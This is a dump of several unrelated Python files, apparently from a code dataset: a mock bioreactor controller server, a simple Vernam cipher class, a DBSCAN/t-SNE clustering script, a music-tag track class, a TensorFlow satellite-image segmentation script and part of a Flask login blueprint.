+{"seq_id":"81750696","text":"\"\"\"\n\nCreated by: Nathan Starkweather\nCreated on: 11/04/2014\nCreated in: PyCharm Community Edition\n\n\n\"\"\"\nfrom collections import OrderedDict\nfrom hello.mock.util import nextroutine, HelloXMLGenerator, simple_xml_dump, json_dumps\n\n__author__ = 'Nathan Starkweather'\n\nfrom math import sin as _sin, pi as _pi\nfrom time import time as _time\nfrom xml.etree.ElementTree import Element, SubElement\n\n\n@nextroutine\ndef sin_wave(amplitude, period, middle=0, offset=0, gen=None, trigfunc=None):\n \"\"\"\n @param amplitude: Size of wave (int)\n @param period: period of wave (in units returned from gen)\n @param middle: verticle offset of wave\n @param offset: horizontal offset of wave\n @param gen: infinite iterator. each new value is used to \"step_main_values\" output. default to time().\n @param trigfunc: trig function to use in mainloop. default to math.sin().\n \"\"\"\n if gen is None:\n gen = _time\n pi = _pi\n if trigfunc is None:\n trigfunc = _sin\n\n pi_over_180 = pi / 180\n start = gen()\n while True:\n t = gen() - start\n result = amplitude * trigfunc((t / period) * pi_over_180 + offset) + middle\n yield t, result\n\n\n@nextroutine\ndef simple_wave(xfunc, yfunc):\n \"\"\"\n @param xfunc: infinite generator accepting no arguments, yielding x values\n @param yfunc: infinite generator accepting a single argument form xfunc, yielding f(x) values\n \"\"\"\n start = xfunc()\n yield start, yfunc(start)\n while True:\n x = xfunc() - start\n yield x, yfunc(x)\n\n\n@nextroutine\ndef multiwave(waves, middle=0):\n \"\"\"\n @param waves: a list or tuple of wave funcs. waves 'middle' argument\n must be all be 0 to work properly.\n @param middle: the middle of the waves\n \"\"\"\n\n if not waves:\n raise ValueError(\"Waves is empty\")\n\n # ensure that the waves iterable is a) a container and not a iterator,\n # and b) can't be weirdly modified by passing in a mutable list\n waves = tuple(waves)\n\n # why did I bother unrolling these loops???\n if len(waves) == 1:\n w = waves[0]\n startx, y = w()\n yield startx, y + middle\n while True:\n x, y = w()\n yield x - startx, y + middle\n\n # for the loops with multiple waves, only the x value\n # for the *first* function is taken into effect\n # don't abuse this!\n elif len(waves) == 2:\n w1, w2 = waves\n startx, y1 = w1()\n _, y2 = w2()\n yield startx, y1 + y2 + middle\n while True:\n x1, y1 = w1()\n _, y2 = w2()\n yield x1 - startx, y1 + y2 + middle\n\n elif len(waves) == 3:\n w1, w2, w3 = waves\n startx, y1 = w1()\n _, y2 = w2()\n _, y3 = w3()\n yield startx, middle + y1 + y2 + y3\n while True:\n x, y1 = w1()\n _, y2 = w2()\n _, y3 = w3()\n yield x - startx, middle + y1 + y2 + y3\n\n # general case.\n # reverse the order of waves so that \"startx\" and \"x\" can be\n # reused within the loop body and end up containing the proper\n # values at the end\n rv = middle\n waves = waves[::-1]\n startx = x = 0\n for w in waves:\n startx, y = w()\n rv += y\n yield startx, rv\n\n while True:\n rv = middle\n waves = waves[::-1]\n for w in waves:\n x, y = w()\n rv += y\n yield x, rv\n\n\nclass BaseController():\n\n \"\"\" Base controller for Backend controllers.\n Controllers know:\n - Their current values\n - The appropriate units for each value (for getMainInfo)\n - How to turn the above into dict objects or Element trees.\n \"\"\"\n\n name_to_lv_type = {\n 'pv': 'SGL',\n 'sp': 'SGL',\n 'man': 'SGL',\n 'manUp': 'SGL',\n 'manDown': 'SGL',\n 'mode': 'U16',\n 'error': 'U16',\n 'interlocked': 'U32'\n }\n\n def __init__(self, name):\n \"\"\"\n @param name: Name of controller\n @type name: str\n @return:\n \"\"\"\n self.name = name\n self._history = []\n\n # these are just placeholders, and will be overridden\n # by subclasses.\n self.pv = 0\n self._pvgenerator = lambda: (0, 0)\n self.mv_attrs = (\"pv\",)\n self.mi_attrs = (\"pvUnit\",)\n\n def set_pvgen(self, gen):\n self._pvgenerator = gen\n\n def step(self):\n rv = self._pvgenerator()\n pv = rv[1]\n self.pv = pv\n self._history.append(rv)\n return pv\n\n def step2(self):\n rv = self._pvgenerator()\n self.pv = rv[1]\n self._history.append(rv)\n return rv # t, pv\n\n def mv_todict(self):\n return {'pv': self.pv}\n\n def mv_todict2(self):\n return OrderedDict((attr, getattr(self, attr)) for attr in self.mv_attrs)\n\n def mv_toxml(self, root=None):\n if root is None:\n cluster = Element('Cluster')\n else:\n cluster = SubElement(root, 'Cluster')\n cluster.text = '\\n'\n cluster.tail = \"\\n\"\n\n name = SubElement(cluster, \"Name\")\n name.text = self.name\n name.tail = \"\\n\"\n vals = SubElement(cluster, 'NumElts')\n vals.text = str(len(self.mv_attrs))\n vals.tail = \"\\n\"\n\n # python unifies number types into a single\n # type, so we have to use a separate mapping\n # to find the proper \"type\" label to wrap\n # the element in.\n for attr in self.mv_attrs:\n lv_type = self.name_to_lv_type[attr]\n typ = SubElement(cluster, lv_type)\n typ.text = \"\\n\"\n typ.tail = \"\\n\"\n\n name = SubElement(typ, \"Name\")\n name.text = attr\n name.tail = \"\\n\"\n val = SubElement(typ, \"Val\")\n\n if lv_type == 'SGL':\n val.text = \"%.5f\" % getattr(self, attr)\n else:\n val.text = \"%s\" % getattr(self, attr)\n val.tail = \"\\n\"\n\n return cluster\n\n def mv_toxml2(self):\n return [(attr, getattr(self, attr)) for attr in self.mv_attrs]\n\n def mi_toxml(self, root=None):\n if root is None:\n cluster = root = Element('Cluster')\n else:\n cluster = SubElement(root, 'Cluster')\n cluster.text = '\\n'\n name = SubElement(cluster, \"Name\")\n name.text = self.name\n NumElts = SubElement(cluster, \"NumElts\")\n NumElts.text = str(len(self.mi_attrs))\n for attr in self.mi_attrs:\n val = getattr(self, attr)\n string_ele = SubElement(cluster, \"String\")\n string_ele.text = '\\n'\n name_ele = SubElement(string_ele, \"Name\")\n name_ele.text = attr\n val_ele = SubElement(string_ele, \"Val\")\n val_ele.text = val\n\n return root\n\n def mi_todict(self):\n return OrderedDict((attr, getattr(self, attr)) for attr in self.mi_attrs)\n\n\nclass StandardController(BaseController):\n def __init__(self, name, pv=0, sp=20, man=5, mode=2, error=0, interlocked=0,\n pvUnit='', manUnit='', manName=''):\n\n super().__init__(name)\n self.pv = pv\n self.sp = sp\n self.man = man\n self.mode = mode\n self.error = error\n self.interlocked = interlocked\n self.pvUnit = pvUnit\n self.manUnit = manUnit\n self.manName = manName\n\n self.mv_attrs = 'pv', 'sp', 'man', 'mode', 'error', 'interlocked'\n self.mi_attrs = 'pvUnit', 'manUnit', 'manName'\n\n self.set_pvgen(sin_wave(5, 30, 15))\n\n def mv_todict(self):\n return {\n 'pv': self.pv,\n 'sp': self.sp,\n 'man': self.man,\n 'mode': self.mode,\n 'error': self.error,\n 'interlocked': self.interlocked\n }\n\n\nclass TwoWayController(BaseController):\n def __init__(self, name, pv=0, sp=20, manup=5, mandown=0, mode=2, error=0, \n interlocked=0, pvUnit='', manUpUnit='', manDownUnit='', manUpName='',\n manDownName=''):\n BaseController.__init__(self, name)\n self.pv = pv\n self.sp = sp\n self.manUp = manup\n self.manDown = mandown\n self.mode = mode\n self.error = error\n self.interlocked = interlocked\n self.pvUnit = pvUnit\n self.manUpUnit = manUpUnit\n self.manDownUnit = manDownUnit\n self.manUpName = manUpName\n self.manDownName = manDownName\n\n self.mv_attrs = 'pv', 'sp', 'manUp', 'manDown', 'mode', 'error', 'interlocked'\n self.mi_attrs = 'pvUnit', 'manUpUnit', 'manDownUnit', 'manUpName', 'manDownName'\n\n self.set_pvgen(sin_wave(3, 60, 50))\n\n def mv_todict(self):\n return {\n 'pv': self.pv,\n 'sp': self.sp,\n 'manUp': self.manUp,\n 'manDown': self.manDown,\n 'mode': self.mode,\n 'error': self.error,\n 'interlocked': self.interlocked\n }\n\n\nclass SmallController(BaseController):\n def __init__(self, name, pv=0, sp=0, mode=0, error=0, pvUnit=\"\"):\n BaseController.__init__(self, name)\n self.pv = pv\n self.sp = sp\n self.mode = mode\n self.error = error\n self.pvUnit = pvUnit\n\n self.mv_attrs = 'pv', 'mode', 'error'\n self.mi_attrs = 'pvUnit',\n\n self.set_pvgen(sin_wave(1, 10, 5))\n\n def mv_todict(self):\n return {\n 'pv': self.pv,\n 'mode': self.mode,\n 'error': self.error\n }\n\n\nclass AgitationController(StandardController):\n def __init__(self, pv=0, sp=20, man=5, mode=2, error=0, interlocked=0):\n StandardController.__init__(self, \"Agitation\", pv, sp, man, mode, error, interlocked)\n self.pvUnit = \"RPM\"\n self.manUnit = \"%\"\n self.manName = \"Percent Power\"\n self.mv_attrs = tuple(a for a in self.mv_attrs if a != 'interlocked')\n\n\nclass TemperatureController(StandardController):\n def __init__(self, pv=0, sp=20, man=5, mode=2, error=0, interlocked=0):\n StandardController.__init__(self, \"Temperature\", pv, sp, man, mode, error, interlocked)\n self.pvUnit = \"\\xb0C\"\n self.manUnit = \"%\"\n self.manName = \"Heater Duty\"\n\n\nclass pHController(TwoWayController):\n def __init__(self, pv=0, sp=20, manup=5, mandown=0, mode=2, error=0, interlocked=0):\n TwoWayController.__init__(self, \"pH\", pv, sp, manup, mandown, mode, error, interlocked)\n self.pvUnit = \"\"\n self.manUpUnit = \"%\"\n self.manDownUnit = \"%\"\n self.manUpName = \"Base\"\n self.manDownName = \"CO_2\"\n self.mv_attrs = tuple(a for a in self.mv_attrs if a != 'interlocked')\n\n\nclass DOController(TwoWayController):\n def __init__(self, pv=0, sp=20, manup=5, mandown=0, mode=2, error=0, interlocked=0):\n TwoWayController.__init__(self, \"DO\", pv, sp, manup, mandown, mode, error, interlocked)\n self.pvUnit = \"%\"\n self.manUpUnit = \"mL/min\"\n self.manDownUnit = \"%\"\n self.manUpName = \"O_2\"\n self.manDownName = \"N_2\"\n self.mv_attrs = tuple(a for a in self.mv_attrs if a != 'interlocked')\n\n\nclass MainGasController(StandardController):\n def __init__(self, pv=0, sp=0, mode=0, error=0, interlocked=0):\n StandardController.__init__(self, \"MainGas\", pv, sp, mode, error, interlocked)\n self.pvUnit = \"L/min\"\n self.manUnit = \"L/min\"\n self.manName = \"Total Flow\"\n self.mv_attrs = tuple(a for a in self.mv_attrs if a != 'sp')\n\n\nclass LevelController(SmallController):\n def __init__(self, pv=0, sp=0, mode=0, error=0):\n SmallController.__init__(self, \"Level\", pv, sp, mode, error)\n self.pvUnit = \"L\"\n\n\nclass FilterOvenController(SmallController):\n def __init__(self, pv=0, sp=0, mode=0, error=0):\n SmallController.__init__(self, \"Condenser\", pv, sp, mode, error)\n self.pvUnit = \"\\xb0C\"\n\n\nclass PressureController(SmallController):\n def __init__(self, pv=0, sp=0, mode=0, error=0):\n SmallController.__init__(self, \"Pressure\", pv, sp, mode, error)\n self.pvUnit = \"psi\"\n\n\nclass SecondaryHeatController(StandardController):\n def __init__(self, pv=0, sp=0, mode=0, error=0, interlocked=0):\n StandardController.__init__(self, \"SecondaryHeat\", pv, sp, mode, error, interlocked)\n self.pvUnit = \"\\xb0C\"\n self.manUnit = \"%\"\n self.manName = \"Heater Duty\"\n\n\nclass HelloStateError(Exception):\n pass\n\n\nclass AuthError(HelloStateError):\n \"\"\" generic permissions error \"\"\"\n pass\n\n\nclass LoginError(AuthError):\n \"\"\" specifically, bad username/password\n \"\"\"\n\n\nfrom time import time\n\n\nversion_info = OrderedDict((\n (\"RIO\", \"V12.1\"),\n (\"Server\", \"V3.1\"),\n (\"Model\", \"PBS 3\"),\n (\"Database\", \"V2.2\"),\n (\"Serial Number\", \"01459C77\"),\n (\"Magnetic Wheel\", True)\n))\n\n\nclass HelloState():\n\n def __init__(self):\n self.agitation = a = AgitationController(0, 20, 1, 0, 0, 0)\n self.temperature = t = TemperatureController(30, 37, 0, 0, 0, 0)\n self.ph = ph = pHController(7, 7.1, 5, 5, 0)\n self.do = d = DOController(50, 70, 15, 150, 0)\n self.maingas = m = MainGasController(0, 0, 0.5, 1)\n self.secondaryheat = sh = SecondaryHeatController(30, 37, 0, 0)\n self.level = l = LevelController(3)\n self.filteroven = f = FilterOvenController(40, 50)\n self.pressure = p = PressureController(0, 0, 0)\n\n self._mv_controller_array = a, t, sh, d, ph, p, l, f, m\n self._mi_controller_array = a, t, d, ph, p, l, f, sh, m\n\n self._login_info = {\n 'user1': '12345',\n 'pbstech': '727246',\n 'webuser1': '1'\n }\n self._logged_in = False\n self._last_login = 0\n\n self._version_info = version_info.copy()\n self.true_reply_xml_encoding = \"windows-1252\"\n\n self.xml_gen = HelloXMLGenerator()\n\n def step_main_values(self):\n for c in self._mv_controller_array:\n c.step()\n\n def get_dict_main_values(self):\n return OrderedDict((\n (\"result\", \"True\"),\n (\"message\", OrderedDict((c.name.lower(), c.mv_todict2()) for c in self._mv_controller_array))\n ))\n\n def get_update(self, json=True):\n self.step_main_values()\n return self.getMainValues(json)\n\n def get_xml_main_values(self):\n\n # I don't know why, but the server reply for the\n # real hello webserver returns main value controllers\n # in a different order if xml vs json is requested.\n # 4-15-15: XML is created via dump to string, JSON by format\n # existing string template.\n\n message = [(c.name, c.mv_toxml()) for c in self._mv_controller_array if c.name != 'SecondaryHeat']\n message.append((self.secondaryheat.name, self.secondaryheat.mv_toxml()))\n return self.xml_gen.hello_tree_from_msg(message, \"Message\")\n\n def getMainValues(self, json=True):\n if json:\n return json_dumps(self.get_dict_main_values())\n else:\n return self.xml_gen.tree_to_xml(self.get_xml_main_values(), 'windows-1252')\n\n def login(self, val1, val2, loader, skipvalidate):\n user = val1 # clarity\n pwd = val2 # clarity\n missing = object()\n if self._login_info.get(user.lower(), missing) == pwd:\n self._logged_in = True\n self._last_login = time()\n return True\n return False\n\n def logout(self):\n self._logged_in = False\n return True\n\n def getversion(self, json=False):\n\n message = self._version_info\n if json:\n reply = OrderedDict((\n (\"result\", \"True\"),\n (\"message\", message)\n ))\n rv = json_dumps(reply)\n else:\n rv = self.xml_gen.create_hello_xml(message, \"Versions\",\n \"True\", self.true_reply_xml_encoding)\n\n return rv\n\n def getmaininfo(self, json=False):\n message = OrderedDict((c.name, c.mi_todict()) for c in self._mi_controller_array)\n message['BioReactorModel'] = self._version_info['Model']\n message.move_to_end('SecondaryHeat')\n message.move_to_end('MainGas')\n if json:\n msg = json_dumps(OrderedDict((\n (\"result\", \"True\"),\n (\"message\", message)\n )))\n\n return msg.encode('utf-8')\n else:\n return self.xml_gen.create_hello_xml(message, \"Message\", \"True\", self.true_reply_xml_encoding)\n\n\ndef test1():\n from xml.etree.ElementTree import XML\n xml = HelloState().getMainValues(False)\n xml = XML(xml)\n for line in simple_xml_dump(xml).split():\n print(line)\n # dump(xml)\n\nif __name__ == '__main__':\n test1()\n","sub_path":"archive/mock/state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":16740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"9964499","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport random\nimport string\n\n\nclass ChiffreVernam:\n\n \"\"\"\n Constructeur, on y initialise le texte à crypter ou décrypter,\n la liste des caractères à utiliser et la clé qui sera utilisée pour le cryptage\n \"\"\"\n def __init__(self, sText, aChars=list(\" ?!,.'\\\"\"+string.ascii_letters+string.digits)):\n if isinstance(sText, str) and sText.__len__() > 0:\n self.sText = sText\n else:\n raise Exception(\"La variable \\\"sText\\\" doit être une chaîne de caractères de longueur supérieur à 0!\")\n if isinstance(aChars, list) and aChars.__len__ > 10:\n self.aChars = aChars\n self.sMask = ''.join(random.choice(aChars) for x in range(self.sText.__len__()))\n else:\n raise Exception(\"La variable \\\"aChars\\\" doit être une liste avec un nombre de caractères supérieur à 10!\")\n\n \"\"\"\n Cette fonction permet de crypter un seul caractère en utilisant un masque\n \"\"\"\n def __cryptChar(self, actChar, maskChar):\n iActChar = self.aChars.index(actChar)\n iMaskChar = self.aChars.index(maskChar)\n iCryptedChar = iActChar+iMaskChar\n if iCryptedChar > (self.aChars.__len__()-1):\n iCryptedChar -= (self.aChars.__len__()-1)\n return self.aChars[iCryptedChar]\n\n \"\"\"\n Cette fonction permet de décrypter un seul caractère en utilisant\n le masque avec le quel on l'a crypté\n \"\"\"\n def __decryptChar(self, cryptedChar, maskChar):\n iCryptedChar = self.aChars.index(cryptedChar)\n iMaskChar = self.aChars.index(maskChar)\n iActChar = iCryptedChar-iMaskChar\n if iActChar < 0:\n iActChar += (self.aChars.__len__()-1)\n return self.aChars[iActChar]\n\n \"\"\"\n Cette fonction fait appel à la fonction __cryptChar pour\n crypter le texte en utilisant la clé généré dans le constructeur.\n \"\"\"\n def cryptText(self):\n sCrypted = \"\"\n for iKey, cValue in enumerate(self.sText):\n sCrypted += self.__cryptChar(cValue, self.sMask[iKey])\n return sCrypted\n\n \"\"\"\n Cette fonction fait appel à la fonction __decryptChar pour décrypter\n le texte en utilisant la clé qu'on doit passer en paramètre.\n \"\"\"\n def decryptText(self, sMask):\n sDecrypted = \"\"\n for iKey, cValue in enumerate(self.sText):\n sDecrypted += self.__decryptChar(cValue, sMask[iKey])\n return sDecrypted\n\n","sub_path":"opt.py","file_name":"opt.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"182552684","text":"import os\nimport pandas as pd\nfrom sklearn.cluster import KMeans\nfrom sklearn.cluster import DBSCAN\nfrom sklearn.decomposition import PCA\nfrom sklearn.manifold import TSNE\nimport matplotlib.pyplot as plt\nfrom sklearn.cluster import AgglomerativeClustering\n\n\nCIC_data_folder = \"./shortened_data\"\n\n\n\n\n\ncolor_map = []\ncolor_map_explicit = []\ncolor_set = ['red','blue','yellow','green','orange','purple','lawngreen','magenta','cyan','darkviolet','plum','mediumturquoise','springgreen','lightcoral','gold','aquamarine','darkcyan','royalblue','slategrey','indigo','olivedrab','blueviolet','palegreen','peru','chocolate','firebrick','wheat','salmon','turquoise','black']\ndata = pd.DataFrame()\ndatanum = 0\nfor entry in os.scandir(CIC_data_folder):\n #data = data.append(pd.read_csv(entry, header=None).drop(columns=[0,1]), ignore_index=True)\n if data.empty:\n data = pd.read_csv(entry, header=None).drop([0])\n else:\n data = data.append(pd.read_csv(entry, header=None).drop([0]), ignore_index=True)\n for row in range(0,len(pd.read_csv(entry, header=None).drop([0]).index)):\n color_map_explicit.append(color_set[datanum])\n datanum +=1\ndata = data.drop(columns=[0,1])\nprint(data)\n\nnumber_of_rows = len(data.index)\n\n\n\n\nnumber_of_clusters = 2\n\n# kmeans = KMeans(n_clusters=number_of_clusters).fit(data)\n# k_cluster = kmeans.labels_\n# agglomerativeCluster = AgglomerativeClustering(n_clusters=number_of_clusters).fit(data)\n# a_cluster = agglomerativeCluster.labels_\ncluster_DBSCAN = DBSCAN(eps=4, min_samples=5).fit(data)\nd_cluster = cluster_DBSCAN.labels_\nprint(max(d_cluster))\n#print(d_cluster)\n\n\n#set up color map based on cluster\nfor row in range(0,number_of_rows):\n color_map.append(color_set[d_cluster[0]])\n\n\n#Visulization (PCA Algorithm)\npca_3d = PCA(n_components=3)\nPCs_3d = pd.DataFrame(pca_3d.fit_transform(data))\n\n#Visualization (t-SNE Algorithm)\n\n\n\ntsne_2d = TSNE(n_components=2, perplexity=3) #7,10,11,13,17,19 ,20-22, 27\nTCs_2d = pd.DataFrame(tsne_2d.fit_transform(data))\n \n \n# bx = plt.axes(projection =\"3d\")\n# bx.scatter3D(TCs_2d.loc[:,0],TCs_2d.loc[:,1], TCs_2d.loc[:,2], color = color_map)\n \n \n# plt.title(\"stuff\")\n# plt.show()\n\n#ax = plt.axes(projection =\"3d\")\n#ax.scatter3D(PCs_3d.loc[:,0],PCs_3d.loc[:,1],PCs_3d.loc[:,2], color = color_map)\n#plt.scatter(PCs_3d.loc[:,0],PCs_3d.loc[:,1],c = color_map)\n\n\n#cx = plt.axes(projection =\"3d\")\n#cx.scatter3D(TCs_2d.loc[:,0],TCs_2d.loc[:,1], TCs_2d.loc[:,2], color = color_map_explicit)\np1 = plt.figure(1)\nplt.scatter(TCs_2d.loc[:,0],TCs_2d.loc[:,1],c = color_map_explicit)\nplt.title('t-SNE, Explicit Coloring')\np2 = plt.figure(2)\nplt.scatter(TCs_2d.loc[:,0],TCs_2d.loc[:,1],c = color_map)\nplt.title('t-SNE, Cluster Coloring, DBSCAN')\nplt.show()","sub_path":"Current Files/CIC_dataset_test_v2.py","file_name":"CIC_dataset_test_v2.py","file_ext":"py","file_size_in_byte":2745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"412775180","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport re\nimport os\nimport sys\nimport platform\nfrom mutagen.id3 import ID3\nfrom mutagen.id3 import ID3NoHeaderError\nfrom mutagen import MutagenError\nfrom urllib.parse import unquote\n\nclass track:\n \"\"\"\n Track's class, each track is music a file such mp3, ogg, wma (sic), mpc, flac...\n \"\"\"\n\n def __init__(self,fileName=\"\",extension=\"\",subPath=\"\"):\n self.trackID = 0\n self.title = \"\"\n self.album = \"\"\n self.artist = \"\"\n self.year = 0\n self.trackNumber = 0\n self.position = 0\n self.fileName = fileName\n self.subPath = subPath\n self.path = \"\"\n self.extension = extension\n self.musicDirectoryID = \"\"\n self.mrl = \"\"\n self.parentAlbum = None\n self.radioName = \"\"\n self.radioStream = \"\"\n\n\n\n def printInfos(self):\n print(\"TrackTitle: \"+self.title)\n\n def getFilePathInAlbumDir(self):\n return os.path.join(self.subPath,self.fileName+self.extension)\n\n def setPath(self,path):\n self.subPath = \"\"\n self.path = os.path.dirname(path)\n basename = os.path.basename(path)\n self.fileName, self.extension = os.path.splitext(basename)\n\n def getArtistName(self):\n if self.parentAlbum is not None:\n return self.parentAlbum.artistName\n else:\n return self.artist\n\n\n def getAlbumTitle(self):\n if self.parentAlbum is not None:\n return self.parentAlbum.title\n else:\n return self.album\n\n def getTrackTitle(self):\n if self.radioName != \"\":\n return self.radioName\n else:\n return self.title\n \n\n\n def extractDataFromTagsWithVLC(self,player,dir):\n \"\"\"Extract ID3 metadatas with VLC\"\"\"\n parsedMedia = player.getParsedMedia(os.path.join(dir,self.getFilePathInAlbumDir()))\n self.title = parsedMedia.get_meta(0)\n self.album = parsedMedia.get_meta(4)\n self.artist = parsedMedia.get_meta(1)\n self.trackNumber = parsedMedia.get_meta(5)\n self.year = parsedMedia.get_meta(8)\n print(\"title=\"+self.title+\" album=\"+str(self.album)+\" artist=\"+str(self.artist)+\" N°\"+str(self.trackNumber))\n\n\n def setMRL(self,mrl):\n self.mrl = mrl\n path = unquote(mrl)\n if platform.system() == \"Windows\":\n path = path.replace(\"file:///\",\"\")\n else:\n path = path.replace(\"file://\",\"\")\n self.setPath(path)\n\n\n def getMutagenTags(self,dir=\"\"):\n \"\"\"Extract ID3 metadatas with Mutagen\"\"\"\n try:\n if dir != \"\":\n trackPath = os.path.join(dir,self.getFilePathInAlbumDir())\n else:\n trackPath = os.path.join(self.path,self.getFilePathInAlbumDir())\n\n audio = ID3(trackPath)\n\n self.artist = str(audio.get('TPE1'))\n self.album = str(audio.get('TALB'))\n self.title = str(audio.get(\"TIT2\"))\n self.year = str(audio.get(\"TDRC\"))\n self.trackNumber = str(audio.get(\"TRCK\"))\n\n if self.title in(\"\",\"None\"): self.title = self.fileName\n\n except ID3NoHeaderError:\n print(\"No tags\")\n\n except MutagenError:\n print(\"MutagenError:\"+trackPath)\n\n except:\n print(\"exception mutagen: \"+str(sys.exc_info()[0]))\n\n if self.title in(\"\",\"None\"): self.title = self.fileName","sub_path":"track.py","file_name":"track.py","file_ext":"py","file_size_in_byte":3439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"260545795","text":"import numpy as np\nfrom PIL import Image\nimport time\n\nimport tensorflow as tf\nslim = tf.contrib.slim\n\nfn = '01_sat.png'\n\nmean = [103.939, 116.779, 123.68]\n\nchannel_num = 6;\nchannel_name = ['building', 'road', 'water', 'farm', 'tree', 'other']\n\ndef clamp(img):\n img[img<0] = 0\n img[img>255] = 255\n return img\n\ndef vgg_arg_scope(weight_decay=0.0005):\n with slim.arg_scope([slim.conv2d, slim.fully_connected],\n activation_fn=tf.nn.relu,\n weights_regularizer=slim.l2_regularizer(weight_decay),\n biases_initializer=tf.zeros_initializer()):\n with slim.arg_scope([slim.conv2d], padding='SAME') as arg_sc:\n return arg_sc\n\ndef leaky_relu_001(x):\n return tf.nn.leaky_relu(x, alpha=0.01)\n\ndef vgg_16(inputs, is_training=True, keep_prob=0.5, scope='vgg_16'):\n with tf.variable_scope(scope, 'vgg_16', [inputs]) as sc:\n # Collect outputs for conv2d, fully_connected and max_pool2d.\n with slim.arg_scope([slim.conv2d], activation_fn=leaky_relu_001):\n C1 = slim.repeat(inputs, 2, slim.conv2d, 64, [3, 3], scope='conv1')\n P1 = slim.max_pool2d(C1, [2, 2], scope='pool1')\n C2 = slim.repeat(P1, 2, slim.conv2d, 128, [3, 3], scope='conv2')\n P2 = slim.max_pool2d(C2, [2, 2], scope='pool2')\n C3 = slim.repeat(P2, 3, slim.conv2d, 256, [3, 3], scope='conv3')\n P3 = slim.max_pool2d(C3, [2, 2], scope='pool3')\n C4 = slim.repeat(P3, 3, slim.conv2d, 512, [3, 3], scope='conv4')\n P4 = slim.max_pool2d(C4, [2, 2], scope='pool4')\n C5 = slim.repeat(P4, 3, slim.conv2d, 512, [3, 3], scope='conv5')\n P5 = slim.max_pool2d(C5, [2, 2], scope='pool5')\n\n C6 = slim.conv2d(P5, 1024, [7, 7], scope='conv6')\n C6D = slim.dropout(C6, keep_prob=keep_prob, is_training=is_training, scope='drop6')\n C7 = slim.conv2d(C6D, 1024, [1, 1], scope='conv7')\n C7D = slim.dropout(C7, keep_prob=keep_prob, is_training=is_training, scope='drop7')\n\n D5 = slim.conv2d(C7D, 512, [3, 3], scope='deconv5_conv1')\n PC5 = slim.conv2d(P5, 512, [3, 3], scope='deconv5_conv2')\n D4 = slim.layers.conv2d_transpose(tf.concat([D5, PC5], axis=3), 512, [4, 4], [2, 2], padding='SAME', scope='deconv4')\n PC4 = slim.conv2d(P4, 512, [3, 3], scope='deconv4_conv2')\n D3 = slim.layers.conv2d_transpose(tf.concat([D4, PC4], axis=3), 256, [4, 4], [2, 2], padding='SAME', scope='deconv3')\n PC3 = slim.conv2d(P3, 256, [3, 3], scope='deconv3_conv2')\n D2 = slim.layers.conv2d_transpose(tf.concat([D3, PC3], axis=3), 256, [4, 4], [2, 2], padding='SAME', scope='deconv2')\n PC2 = slim.conv2d(P2, 256, [3, 3], scope='deconv2_conv2')\n D1 = slim.layers.conv2d_transpose(tf.concat([D2, PC2], axis=3), 128, [4, 4], [2, 2], padding='SAME', scope='deconv1')\n PC1 = slim.conv2d(P1, 128, [3, 3], scope='deconv1_conv2')\n D0 = slim.layers.conv2d_transpose(tf.concat([D1, PC1], axis=3), 128, [4, 4], [2, 2], padding='SAME', scope='deconv0')\n logits = slim.conv2d(D0, channel_num, [3, 3], scope='logits')\n\n return logits\n\ndef ConvNet(input):\n curr_arg_scope = vgg_arg_scope()\n with slim.arg_scope(curr_arg_scope):\n logits = vgg_16(input, is_training=False, keep_prob=1.0)\n\n with tf.name_scope('classify'):\n result = tf.nn.softmax(logits, name='result') # softmax applied to last dimension. or, specified by \"dim\"\n\n return result\n\ntest_fn = ConvNet\n\ninput = tf.placeholder(tf.float32, [None, None, None, 3])\nprediction = test_fn(input)\nresult = tf.identity(prediction, name='result')\n\nsess = tf.InteractiveSession()\nsaver = tf.train.Saver(max_to_keep=3)\nsaver.restore(sess, 'checkpoint/last_checkpoint.ckpt')\n\ntemp_sat_PIL = Image.open(fn)\ntemp_sat = np.array(temp_sat_PIL)\ntemp_sat_ = np.copy(temp_sat).astype('float32')\nfor ch in range(3):\n temp_sat_[..., ch] -= mean[ch]\nth, tw, tc = temp_sat_.shape\nimg_input = np.zeros((1, th, tw, 3))\nimg_input[0, :, :, :] = temp_sat_\nc0 = img_input.astype('float32')\n\ntic = time.clock()\n\ntest_result = sess.run(result, feed_dict={input: c0})\n\ntb, th, tw, tc = test_result.shape\ntest_img = np.zeros((th, tw, 3))\ntest_img_ = test_result[0, ...]\ntest_back = np.zeros((th, tw))\nfor j in range(channel_num-1):\n test_back += test_img_[:, :, j]\n\ntest_norm = np.copy(test_back)\ntest_norm[test_norm < 1.0] = 1.0\n\ntest_back[test_back > 1.0] = 1.0\ntest_back = 1 - test_back\n\nfor j in range(channel_num):\n test_img_[..., j] /= test_norm\n\ntest_img[:, :, 0] = test_img_[:, :, 0] * 0 + test_img_[:, :, 1] * 255 + test_img_[:, :, 2] * 255 + test_img_[:, :, 3] * 0 + test_img_[:, :, 4] * 0 + test_back * 255\ntest_img[:, :, 1] = test_img_[:, :, 0] * 0 + test_img_[:, :, 1] * 0 + test_img_[:, :, 2] * 223 + test_img_[:, :, 3] * 255 + test_img_[:, :, 4] * 80 + test_back * 255\ntest_img[:, :, 2] = test_img_[:, :, 0] * 255 + test_img_[:, :, 1] * 0 + test_img_[:, :, 2] * 206 + test_img_[:, :, 3] * 0 + test_img_[:, :, 4] * 0 + test_back * 255\n\ntoc = time.clock()\nprocess_time = '%4.2f(s)' % (toc-tic)\n\ntest_img_PIL = Image.fromarray(np.uint8(test_img[..., ::-1]))\ntest_img_PIL.save('test.png')\n","sub_path":"ss/test_SS.py","file_name":"test_SS.py","file_ext":"py","file_size_in_byte":5082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"429716844","text":"from flask import Blueprint, request, session, render_template\nfrom models.user import requires_login\n\nuser_blueprint = Blueprint('users', __name__)\n\n\n@user_blueprint.route('/login')\ndef login_user():\n is_logged_in = False if not session.get('email') else True\n return render_template(\"users/login.html\", is_logged_in=is_logged_in)\n\n\n@user_blueprint.route('/register')\ndef register_user():\n is_logged_in = False if not session.get('email') else True\n return render_template(\"users/register.html\", 